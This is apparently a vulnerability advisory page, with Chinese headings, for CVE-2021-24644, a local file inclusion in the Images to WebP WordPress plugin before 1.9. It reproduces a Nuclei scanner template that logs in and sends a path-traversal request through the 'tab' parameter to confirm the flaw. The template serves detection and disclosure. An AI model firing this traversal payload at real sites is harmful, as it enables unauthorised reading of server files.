漏洞描述
The Images to WebP WordPress plugin before version 1.9 did not validate or sanitize the tab parameter before using it in the include() function.
CVE-2021-24644: Images to WebP < 1.9 - Authenticated Local File Inclusion
PoC代码[已公开]
id: CVE-2021-24644
info:
name: Images to WebP < 1.9 - Authenticated Local File Inclusion
author: Sourabh-Sahu
severity: high
description: |
The Images to WebP WordPress plugin before version 1.9 did not validate or sanitize the tab parameter before using it in the include() function.
remediation: Fixed in 1.9
reference:
- https://wpscan.com/vulnerability/5a363eeb-9510-4535-97e2-9dfd3b10d511/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24644
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-24644
cwe-id: CWE-22
epss-score: 0.20545
epss-percentile: 0.95377
cpe: cpe:2.3:a:imagestowebp_project:images_to_webp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: imagestowebp_project
product: images_to_webp
framework: wordpress
publicwww-query: "/wp-content/plugins/images-to-webp/"
tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/upload.php?page=images-to-webp.php&tab=..%2F..%2F..%2F..%2Fwp-links-opml HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "wp-links-opml", "Images to WebP")
- regex('[A-Za-z]{3}, [0-9]{2} [A-Za-z]{3} 20[0-9]{2}', body)
condition: and
# digest: 490a00463044022011e863c663df1a91a3df615f251fa62cb63a94c7e83f63afcc0f57ca57e61c02022007b817ac9bf171100e1f2fd64a1370698cf211b4c6f88337ed7da31f5453c259:922c64590222798bb761d5b6d8e72950